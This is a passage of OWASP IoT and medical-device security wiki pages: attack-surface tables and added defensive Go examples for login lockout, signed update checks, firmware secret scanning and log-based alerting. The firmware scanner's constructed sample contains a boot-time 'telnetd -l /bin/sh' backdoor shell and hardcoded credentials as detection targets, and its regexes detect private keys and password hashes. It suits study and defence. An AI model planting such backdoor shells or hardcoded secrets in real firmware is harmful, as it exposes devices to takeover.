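The three authentication rows above (username enumeration, weak passwords, account lockout) describe what a tester probes for. The Go program below is an added example written for this page, not code from the OWASP IoT Project or any device vendor, and shows the corresponding defensive checks together: a password policy that rejects defaults such as '1234', a login response that is identical for an unknown user, a wrong password and a locked account, and a lockout after a fixed number of failures. The account store, the denylist, the thresholds (5 failures, 15-minute lock) and the plain SHA-256 hash are assumptions for the example; real firmware should use a slow, salted password hash.<br />

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"fmt"
	"strings"
	"time"
)

// Thresholds are constructed for this example; pick them per product.
const (
	maxFailures    = 5                // lock the account after this many failures
	lockoutTime    = 15 * time.Minute // how long the lock lasts
	minPasswordLen = 12
)

// Constructed denylist of default and trivially guessable passwords.
var weakPasswords = map[string]bool{
	"1234": true, "123456": true, "12345678": true, "password": true,
	"admin": true, "admin1234": true, "passw0rd1234": true,
}

type account struct {
	hash        [32]byte // SHA-256 only to stay dependency-free; use bcrypt/scrypt/argon2 on a real device
	failures    int
	lockedUntil time.Time
}

// Authenticator is an in-memory account store with lockout. The clock is
// injectable so behaviour around the lockout window can be tested.
type Authenticator struct {
	accounts map[string]*account
	now      func() time.Time
}

func NewAuthenticator(now func() time.Time) *Authenticator {
	return &Authenticator{accounts: map[string]*account{}, now: now}
}

// ValidatePassword enforces a minimum length and rejects known default/weak values.
func ValidatePassword(pw string) error {
	if len(pw) < minPasswordLen {
		return fmt.Errorf("password must be at least %d characters", minPasswordLen)
	}
	if weakPasswords[strings.ToLower(pw)] {
		return fmt.Errorf("password is a known default or weak value")
	}
	return nil
}

// AddUser is what the initial-setup flow calls: a password is stored only if it
// passes policy, so the device never runs with a default credential.
func (a *Authenticator) AddUser(user, pw string) error {
	if err := ValidatePassword(pw); err != nil {
		return err
	}
	a.accounts[user] = &account{hash: sha256.Sum256([]byte(pw))}
	return nil
}

// Login returns the same generic message for an unknown user, a wrong password
// and a locked account, so the response cannot be used to enumerate usernames.
func (a *Authenticator) Login(user, pw string) (bool, string) {
	const generic = "invalid credentials"
	got := sha256.Sum256([]byte(pw)) // hash before the lookup so unknown users cost the same
	acct, ok := a.accounts[user]
	if !ok {
		return false, generic
	}
	now := a.now()
	if now.Before(acct.lockedUntil) {
		return false, generic // locked: even the right password is refused
	}
	if subtle.ConstantTimeCompare(got[:], acct.hash[:]) == 1 {
		acct.failures = 0
		return true, ""
	}
	acct.failures++
	if acct.failures >= maxFailures {
		acct.lockedUntil = now.Add(lockoutTime)
		acct.failures = 0
	}
	return false, generic
}

// IsLocked is for the admin console and the audit log, never for the login response.
func (a *Authenticator) IsLocked(user string) bool {
	acct, ok := a.accounts[user]
	return ok && a.now().Before(acct.lockedUntil)
}

func main() {
	auth := NewAuthenticator(time.Now)
	fmt.Println("set '1234':", auth.AddUser("admin", "1234"))
	fmt.Println("set strong:", auth.AddUser("admin", "correct-horse-battery"))
	for i := 0; i < maxFailures; i++ {
		ok, msg := auth.Login("admin", "wrong")
		fmt.Println("attempt", i+1, ok, msg)
	}
	ok, _ := auth.Login("admin", "correct-horse-battery")
	fmt.Println("correct password while locked:", ok, "locked:", auth.IsLocked("admin"))
}
```

The clock is injected so the lockout window can be exercised without waiting; on a device it would be the RTC or a monotonic tick. The lockout is per account, so an attacker can still lock a legitimate user out by spamming failures, which is why the failures should also be logged and throttled per source address.<br />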
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (Wi-Fi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
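The Update Mechanism row above (and the update rows in the IoT Vulnerabilities table) name what goes wrong: updates that are unsigned, unverified, or allowed to downgrade. The following Go program, added here as an example and not part of the OWASP project or any vendor's update client, shows the checks a device should complete before writing an image to flash: verify an Ed25519 signature over a manifest using the vendor public key provisioned into the device, reject images built for another model, refuse any version at or below the running one, and compare the image's SHA-256 hash with the signed value. The manifest layout, model names and version numbers are constructed for the example.<br />

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Manifest is the metadata a device checks before applying an image. The layout
// is constructed for this example: the signed bytes are
//   version (uint32, big endian) || len(model) || model || sha256(image)
type Manifest struct {
	Version   uint32
	Model     string
	ImageHash [32]byte
	Signature []byte // Ed25519 signature over SignedBytes()
}

func (m Manifest) SignedBytes() []byte {
	buf := make([]byte, 4)
	binary.BigEndian.PutUint32(buf, m.Version)
	buf = append(buf, byte(len(m.Model))) // model names are assumed shorter than 256 bytes
	buf = append(buf, m.Model...)
	return append(buf, m.ImageHash[:]...)
}

// Device holds what the verifier needs: the vendor's public key (burned into ROM
// or the bootloader at manufacture), the hardware model and the running version.
type Device struct {
	VendorKey      ed25519.PublicKey
	Model          string
	CurrentVersion uint32
}

var (
	ErrBadSignature = errors.New("manifest signature invalid")
	ErrWrongModel   = errors.New("manifest is for a different model")
	ErrRollback     = errors.New("update would downgrade or reinstall the running version")
	ErrHashMismatch = errors.New("image hash does not match manifest")
)

// VerifyUpdate is the full check to run before writing anything to flash:
// signature first (after that, nothing below is attacker-controlled), then
// model, then anti-rollback, then image integrity.
func (d Device) VerifyUpdate(m Manifest, image []byte) error {
	if !ed25519.Verify(d.VendorKey, m.SignedBytes(), m.Signature) {
		return ErrBadSignature
	}
	if m.Model != d.Model {
		return ErrWrongModel
	}
	if m.Version <= d.CurrentVersion {
		return ErrRollback
	}
	if sha256.Sum256(image) != m.ImageHash {
		return ErrHashMismatch
	}
	return nil
}

// SignManifest is the vendor-side build step. The private key stays on the
// build/signing system; it is never present on the device.
func SignManifest(priv ed25519.PrivateKey, version uint32, model string, image []byte) Manifest {
	m := Manifest{Version: version, Model: model, ImageHash: sha256.Sum256(image)}
	m.Signature = ed25519.Sign(priv, m.SignedBytes())
	return m
}

// NewVendorKey generates a fresh signing key pair for the example only; a real
// vendor key lives in an HSM and only its public half is provisioned into devices.
func NewVendorKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

func main() {
	pub, priv := NewVendorKey()
	dev := Device{VendorKey: pub, Model: "cam-200", CurrentVersion: 7}
	image := []byte("constructed firmware image bytes")
	good := SignManifest(priv, 8, "cam-200", image)
	fmt.Println("valid update:   ", dev.VerifyUpdate(good, image))
	tampered := append([]byte{}, image...)
	tampered[0] ^= 0xff
	fmt.Println("tampered image: ", dev.VerifyUpdate(good, tampered))
	fmt.Println("downgrade to v6:", dev.VerifyUpdate(SignManifest(priv, 6, "cam-200", image), image))
	forged := good
	forged.Version = 9 // edited after signing
	fmt.Println("edited manifest:", dev.VerifyUpdate(forged, image))
}
```

Transport encryption (TLS) is still worth having so an observer cannot learn what the device runs, but it is the signature that stops a malicious update: an image fetched from a world-writable or spoofed location fails the first check regardless of how it was transmitted.<br />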
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! Contents<br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS versions (e.g. SSLv2, SSLv3)<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH are protected by a strong password (or key-based authentication) and do not ship with a default one<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry-standard encryption and strong, salted password hashing are used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|}<br />
<br />
{{Social Media Links}}<br />
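As an added illustration of the "Firmware file analysis" and "File system analysis" steps above (example code written for this page, not a tool from the OWASP project), the Go program below does in miniature what Binwalk and Firmwalker do: it scans a firmware blob for well-known magic bytes marking embedded kernel images and file systems, then searches an extracted root file system for private keys, password hashes, hardcoded passwords and debug services started at boot. The firmware image, the file tree and the signature list are constructed for the example; real images use many more container formats, and the regular expressions need tuning per target to keep false positives down.<br />

```go
package main

import (
	"bytes"
	"fmt"
	"regexp"
	"sort"
)

// Signature is a magic-byte pattern marking an embedded kernel image, archive or
// file system inside a monolithic firmware blob (Binwalk's database is far larger).
type Signature struct{ Name string; Magic []byte }

var Signatures = []Signature{
	{Name: "uImage header", Magic: []byte{0x27, 0x05, 0x19, 0x56}},
	{Name: "gzip", Magic: []byte{0x1f, 0x8b, 0x08}},
	{Name: "SquashFS (little endian)", Magic: []byte("hsqs")},
	{Name: "SquashFS (big endian)", Magic: []byte("sqsh")},
	{Name: "CramFS", Magic: []byte{0x45, 0x3d, 0xcd, 0x28}},
	{Name: "ELF", Magic: []byte{0x7f, 'E', 'L', 'F'}},
}

type Hit struct{ Offset int; Name string }

// ScanImage reports every offset at which a known magic appears, in file order.
// Short magics (gzip's 3 bytes) can false-positive; a real tool validates the
// header that follows before reporting.
func ScanImage(img []byte) []Hit {
	var hits []Hit
	for _, s := range Signatures {
		for off := 0; ; {
			i := bytes.Index(img[off:], s.Magic)
			if i < 0 {
				break
			}
			hits = append(hits, Hit{Offset: off + i, Name: s.Name})
			off += i + 1
		}
	}
	sort.Slice(hits, func(a, b int) bool { return hits[a].Offset < hits[b].Offset })
	return hits
}

// Finding is something in an extracted root file system that should not ship.
type Finding struct{ Path, Kind string }

var secretPatterns = []struct{ Kind string; Re *regexp.Regexp }{
	{"private key", regexp.MustCompile(`-----BEGIN (RSA |EC |OPENSSH |)PRIVATE KEY-----`)},
	{"password hash", regexp.MustCompile(`(?m)^[a-z_][a-z0-9_-]*:\$[0-9a-z]+\$[^:]*:`)},
	{"hardcoded password", regexp.MustCompile(`(?i)(passw(or)?d|pwd)\s*[=:]\s*["']?[^\s"']{4,}`)},
	{"telnet/ssh enabled", regexp.MustCompile(`(?m)^\s*(telnetd|dropbear|sshd)\b`)},
}

// ScanFiles walks an extracted root file system (represented as path -> contents)
// and reports credential material and debug services, sorted by path.
func ScanFiles(fs map[string][]byte) []Finding {
	paths := make([]string, 0, len(fs))
	for p := range fs {
		paths = append(paths, p)
	}
	sort.Strings(paths)
	var out []Finding
	for _, p := range paths {
		for _, sp := range secretPatterns {
			if sp.Re.Match(fs[p]) {
				out = append(out, Finding{Path: p, Kind: sp.Kind})
			}
		}
	}
	return out
}

// SampleImage builds a constructed 512-byte "firmware": bootloader padding, a
// uImage header at 64, a gzip-compressed kernel at 128 and a SquashFS root fs at 256.
func SampleImage() []byte {
	img := make([]byte, 64)
	img = append(img, 0x27, 0x05, 0x19, 0x56)
	img = append(img, bytes.Repeat([]byte{0xAA}, 60)...)
	img = append(img, 0x1f, 0x8b, 0x08)
	img = append(img, bytes.Repeat([]byte{0xBB}, 125)...)
	img = append(img, "hsqs"...)
	return append(img, bytes.Repeat([]byte{0xCC}, 252)...)
}

// SampleRootFS is a constructed extracted file system with typical findings.
func SampleRootFS() map[string][]byte {
	return map[string][]byte{
		"/bin/busybox":            []byte("\x7fELF...stripped binary..."),
		"/etc/shadow":             []byte("root:$1$abc$xyz123:0:0:99999:7:::\nnobody:*:0:0:99999:7:::\n"),
		"/etc/init.d/rcS":         []byte("#!/bin/sh\nmount -t proc proc /proc\ntelnetd -l /bin/sh &\n"),
		"/etc/ssl/device.key":     []byte("-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructed\n-----END RSA PRIVATE KEY-----\n"),
		"/www/cgi-bin/config.cgi": []byte("#!/bin/sh\nADMIN_PASSWORD=\"admin1234\"\necho ok\n"),
	}
}

func main() {
	for _, h := range ScanImage(SampleImage()) {
		fmt.Printf("0x%06x  %s\n", h.Offset, h.Name)
	}
	for _, f := range ScanFiles(SampleRootFS()) {
		fmt.Printf("%-28s %s\n", f.Path, f.Kind)
	}
}
```

On a real image the offsets from the first pass are what you feed to `dd` or to Binwalk's extractor to carve out the SquashFS or JFFS2 partition; the second pass then runs over the unpacked tree. A shadow hash that matches across every unit of a product line is the "same credential on all devices" case from the Manufacturer Recommendations above.<br />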
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum set of events an IoT device should log. It is meant to apply across device types, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
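The table lists what to log; a detection program then has to act on it. The Go program below is an added example, not code from the OWASP project, that replays a constructed device log and raises alerts for five of the categories above: multiple failed passwords, a high rate of login attempts from one source, a login using default administrative credentials, a session whose source address changes mid-session, and traffic from a system that was never enrolled. The log format, the thresholds, the addresses and the device identifiers are all assumptions made for the example.<br />

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Event is one parsed log line. The key=value format is constructed for this example:
//   ts=<unix> event=<login_fail|login_ok|request> user= src=<ip> sid=<session> dev=<device id> default_cred=<true|false>
type Event struct{ TS int64; Fields map[string]string }

// ParseLine returns false for lines that do not parse; count those rather than dropping them silently.
func ParseLine(line string) (Event, bool) {
	ev := Event{Fields: map[string]string{}}
	for _, kv := range strings.Fields(line) {
		parts := strings.SplitN(kv, "=", 2)
		if len(parts) != 2 {
			return Event{}, false
		}
		ev.Fields[parts[0]] = parts[1]
	}
	ts, err := strconv.ParseInt(ev.Fields["ts"], 10, 64)
	ev.TS = ts
	return ev, err == nil
}

type Alert struct{ Category, Detail string }

const ( // thresholds are assumptions for the example; tune them per deployment
	failThreshold = 3  // failed logins per user -> "Multiple Failed Passwords"
	rateThreshold = 5  // login attempts per source within rateWindow seconds -> "High Rate of Login Attempts"
	rateWindow    = 60
)

type window struct{ start int64; count int } // fixed-window attempt counter per source

// Detect replays the log in order and raises each distinct alert once; categories mirror the table above.
func Detect(lines []string, enrolled map[string]bool) []Alert {
	var alerts []Alert
	raised := map[string]bool{}
	raise := func(cat, detail string) {
		if key := cat + "|" + detail; !raised[key] {
			raised[key] = true
			alerts = append(alerts, Alert{Category: cat, Detail: detail})
		}
	}
	fails := map[string]int{}         // user -> failed logins
	rates := map[string]window{}      // source -> attempts in the current window
	sessionSrc := map[string]string{} // session id -> source it was first seen from
	for _, line := range lines {
		ev, ok := ParseLine(line)
		if !ok {
			continue
		}
		f, kind := ev.Fields, ev.Fields["event"]
		if dev := f["dev"]; dev != "" && !enrolled[dev] {
			raise("Ecosystem Membership Exceptions", "traffic from unenrolled system "+dev)
		}
		if sid := f["sid"]; sid != "" {
			if prev, seen := sessionSrc[sid]; !seen {
				sessionSrc[sid] = f["src"]
			} else if prev != f["src"] {
				raise("Session Exceptions", "session "+sid+" moved from "+prev+" to "+f["src"])
			}
		}
		if kind == "login_fail" || kind == "login_ok" {
			w := rates[f["src"]]
			if ev.TS-w.start >= rateWindow {
				w = window{start: ev.TS} // start a new window
			}
			w.count++
			rates[f["src"]] = w
			if w.count >= rateThreshold {
				raise("Authentication Exceptions", "high rate of login attempts from "+f["src"])
			}
		}
		if kind == "login_fail" {
			if fails[f["user"]]++; fails[f["user"]] == failThreshold {
				raise("Authentication Exceptions", "multiple failed passwords for "+f["user"])
			}
		}
		if kind == "login_ok" && f["default_cred"] == "true" {
			raise("Administrative Mode Events", "login with default administrative credentials by "+f["user"])
		}
	}
	return alerts
}

// Constructed sample: one source brute-forces admin and gets in with the factory password,
// the session then appears from another address, and an unenrolled device joins in.
var SampleLog = []string{
	"ts=1000 event=login_fail user=admin src=10.0.0.5 dev=cam-01",
	"ts=1005 event=login_fail user=admin src=10.0.0.5 dev=cam-01",
	"ts=1010 event=login_fail user=admin src=10.0.0.5 dev=cam-01",
	"ts=1012 event=login_fail user=root src=10.0.0.5 dev=cam-01",
	"ts=1014 event=login_ok user=admin src=10.0.0.5 sid=s1 dev=cam-01 default_cred=true",
	"ts=1020 event=request src=10.0.0.5 sid=s1 dev=cam-01",
	"ts=1030 event=request src=203.0.113.9 sid=s1 dev=cam-01",
	"ts=1040 event=request src=10.0.0.7 sid=s2 dev=thermo-99",
}

var SampleEnrolled = map[string]bool{"cam-01": true, "gw-01": true}

func main() {
	for _, a := range Detect(SampleLog, SampleEnrolled) {
		fmt.Printf("%-32s %s\n", a.Category, a.Detail)
	}
}
```

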